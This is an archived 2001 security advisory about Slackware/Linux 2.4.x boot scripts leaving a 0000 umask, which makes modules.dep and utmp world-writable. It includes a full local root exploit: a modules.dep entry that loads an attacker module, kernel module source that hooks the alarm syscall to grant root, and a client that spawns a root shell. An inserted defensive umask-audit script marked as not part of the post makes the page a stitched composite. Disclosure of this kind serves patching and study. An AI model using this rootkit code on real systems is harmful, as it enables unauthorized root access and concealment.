2.4.x/Slackware Init script vulnerability

From: joshat_private
Date: Mon Jul 16 2001 - 07:53:01 PDT


    I posted this to the linux kernel mailing list last Friday, July 13th 2001:
    
    Submitted by  : Josh (joshat_private), lockdown
                    (lockdownat_private) on July 16th, 2001
    Vulnerability : /lib/modules/2.4.5/modules.dep
    Tested On     : Slackware 8.0. 2.4.5
    Local         : Yes
    Remote        : No
    Temporary Fix : umask 022 at the top of all your startup scripts
    Target        : root
    Big thanks to : slider, lamagra, zen-parse
    Greets to     : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,
                    cryptix, s0ttle, xphantom, qtip, tirancy, Loki,
                    falcon-networks.com.
    
    	The 2.4.x kernels starting with 2.4.3 (I think) have, after
    load, left a umask of 0000.  This forces any files created by the bootup
    scripts, unless the command `umask 022` has been issued, to be world writeable.
    In Slackware, the affected files include /var/run/utmp and /var/run/gpm.pid.  This same
    vulnerability is responsible for creating /lib/modules/`uname -r`/modules.dep
    world writeable.  With this file world writeable, all an intruder need do is
    put something like the following in /lib/modules/`uname -r`/modules.dep,
    assuming the system's startup scripts modprobe lp:
    
    /lib/modules/2.4.5/kernel/drivers/char/lp.o:  /tmp/alarm.o
    
    /tmp/alarm.o:
    
    where the alarm.o module is:
    
    #include <linux/config.h>
    #include <linux/module.h>
    #include <linux/version.h>
    #include <linux/types.h>
    #include <asm/segment.h>
    #include <asm/unistd.h>
    #include <linux/dirent.h>
    #include <sys/syscall.h>
    #include <sys/sysmacros.h>
    
    #include <linux/sched.h>
    
    #include <linux/errno.h>
    #include <linux/fs.h>
    #include <linux/kernel.h>
    
    extern void* sys_call_table[];
    
    /* saved pointer to the original alarm() system call */
    unsigned int (*old_alarm) (unsigned int seconds);
    unsigned int hacked_alarm (unsigned int seconds);
    
    /* replacement alarm(): a magic argument makes the caller root,
       anything else is passed through to the real alarm() */
    unsigned int hacked_alarm(unsigned int seconds)
    {
        if (seconds == 454) {
            current->uid  = 0;
            current->euid = 0;
            current->gid  = 0;
            current->egid = 0;
            return 0;
        }
        return old_alarm(seconds);
    }
    
    /* on load, hook the alarm entry in the syscall table */
    int init_module(void)
    {
        old_alarm = sys_call_table[SYS_alarm];
        sys_call_table[SYS_alarm] = hacked_alarm;
        return 0;
    }
    
    /* on unload, restore the original entry */
    void cleanup_module(void)
    {
        sys_call_table[SYS_alarm] = old_alarm;
    }
    
    make a client:
    
    #include <stdio.h>
    #include <unistd.h>
    
    int main(void)
    {
        alarm(454);                      /* trip the hooked syscall */
        execl("/bin/sh", "sh", NULL);    /* only returns on failure */
        return 1;
    }
    
    which will, when the module is loaded, execute a shell as root.
    
    
            And of course with /var/run/utmp writeable, users can delete or
    otherwise manipulate their logins as they appear in
    w/who/finger/getlogin(), etc.
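The following is an added example, not part of the original post, showing the defensive side of what is described above: how the umask an init script inherits decides the mode of every file it creates, and how to audit a tree for files that a 0000 umask left world writeable (the modules.dep and utmp cases). The paths and the temporary tree are constructed for the demonstration; the check itself works on any directory, e.g. /var/run or /lib/modules/`uname -r`.

```shell
#!/bin/sh
# Added example (not the original poster's code): demonstrate why
# `umask 022` at the top of startup scripts matters, and audit for
# world-writable files that a 0000 umask leaves behind.

# Create a file the way an init script would (plain redirection),
# under the given umask, and print its permission string, e.g. -rw-rw-rw-.
# Arguments: umask value (octal), path of the file to create.
mode_under_umask() {
    umask_val=$1
    path=$2
    rm -f "$path"
    # Subshell so the caller's own umask is left untouched.
    ( umask "$umask_val" && : > "$path" )
    ls -l "$path" | cut -c1-10
}

# List regular files under a directory that carry the other-write bit
# (mode 002), which is exactly what a umask of 0000 produces.
# POSIX find: -perm -002 matches any file with that bit set.
world_writable() {
    find "$1" -type f -perm -002 2>/dev/null | sort
}

# Self-contained run on a constructed temporary tree.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/modules" "$tmp/run"
    # A boot with umask 0000 leaves modules.dep as -rw-rw-rw- ...
    echo "modules.dep under umask 0000: $(mode_under_umask 0000 "$tmp/modules/modules.dep")"
    # ... while `umask 022` first gives the expected -rw-r--r--.
    echo "gpm.pid under umask 022:      $(mode_under_umask 022 "$tmp/run/gpm.pid")"
    echo "world-writable files found:"
    world_writable "$tmp"
    rm -rf "$tmp"
}

if [ "${1-}" = "demo" ]; then
    demo
fi
```

Run it as `sh umask_check.sh demo`; the audit function alone, pointed at /lib/modules/`uname -r` or /var/run, is the check worth adding to a post-boot sanity script on an affected system, and an empty result is what a script that starts with `umask 022` should give.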
    



    This archive was generated by hypermail 2b30 : Mon Jul 16 2001 - 09:01:33 PDT